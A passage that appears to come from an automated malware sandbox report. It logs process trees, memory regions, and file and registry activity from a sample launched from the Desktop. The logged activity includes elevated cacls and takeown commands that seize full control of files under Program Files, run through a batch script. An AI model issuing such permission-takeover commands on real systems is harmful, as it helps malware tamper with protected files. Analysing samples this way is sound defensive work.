| kernelbase.dll.mui | 0x04ba0000 | 0x04c7efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04d40000 | 0x05076fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x769b0000 | 0x76a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x773e0000 | 0x773e6fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f420000 | 0x7f420000 | 0x7f51ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f520000 | 0x7f520000 | 0x7f542fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f545000 | 0x7f545000 | 0x7f545fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f547000 | 0x7f547000 | 0x7f549fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f54a000 | 0x7f54a000 | 0x7f54cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f54d000 | 0x7f54d000 | 0x7f54dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = TileWallpaper, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x960000 |
|
1 |
Process #23: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:54, Reason: Child Process |
| Unmonitor | End Time: 00:01:57, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x474 |
| Parent PID | 0x40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A4C
0x
344
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000320000 | 0x00320000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00341fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00363fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00400fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00411fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e7d0000 | 0x7e7d0000 | 0x7e7f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e7fa000 | 0x7e7fa000 | 0x7e7fafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7fc000 | 0x7e7fc000 | 0x7e7fcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7fd000 | 0x7e7fd000 | 0x7e7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #24: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:54, Reason: Child Process |
| Unmonitor | End Time: 00:01:57, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfd4 |
| Parent PID | 0xd74 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
504
0x
838
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x04feffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x0500ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ff0000 | 0x04ff0000 | 0x04ffffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x05003fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x05011fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005020000 | 0x05020000 | 0x05033fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x050bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050c0000 | 0x050c0000 | 0x050c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050d0000 | 0x050d0000 | 0x050d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050e0000 | 0x050e0000 | 0x050e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x050f0000 | 0x051adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000051e0000 | 0x051e0000 | 0x051effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051f0000 | 0x051f0000 | 0x0522ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005260000 | 0x05260000 | 0x0535ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005360000 | 0x05360000 | 0x0539ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005590000 | 0x05590000 | 0x0559ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74820000 | 0x74847fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee90000 | 0x7ee90000 | 0x7ef8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef90000 | 0x7ef90000 | 0x7efb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efb7000 | 0x7efb7000 | 0x7efb7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efb8000 | 0x7efb8000 | 0x7efbafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efbb000 | 0x7efbb000 | 0x7efbdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efbe000 | 0x7efbe000 | 0x7efbefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #25: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:55, Reason: Child Process |
| Unmonitor | End Time: 00:02:00, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x35c |
| Parent PID | 0xe18 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
32C
0x
134
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x04b0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b31fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b40000 | 0x04b40000 | 0x04b53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04bdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x04be3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb80000 | 0x7eb80000 | 0x7eba2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eba9000 | 0x7eba9000 | 0x7ebabfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebac000 | 0x7ebac000 | 0x7ebacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebaf000 | 0x7ebaf000 | 0x7ebaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #26: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Journal.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:56, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x768 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
630
0x
5FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x04e7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e80000 | 0x04e80000 | 0x04e8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e93fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04ea1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04ea3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004eb0000 | 0x04eb0000 | 0x04ec3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x0500ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005010000 | 0x05010000 | 0x05013fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005020000 | 0x05020000 | 0x05020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005030000 | 0x05030000 | 0x05031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0508ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005090000 | 0x05090000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x050a0000 | 0x0515dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x0532ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005330000 | 0x05330000 | 0x0542ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000055e0000 | 0x055e0000 | 0x055effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x055f0000 | 0x05926fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e930000 | 0x7e930000 | 0x7ea2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea30000 | 0x7ea30000 | 0x7ea52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea57000 | 0x7ea57000 | 0x7ea59fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5a000 | 0x7ea5a000 | 0x7ea5afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5c000 | 0x7ea5c000 | 0x7ea5efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5f000 | 0x7ea5f000 | 0x7ea5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 216, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xb1c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x9a8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xcf8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
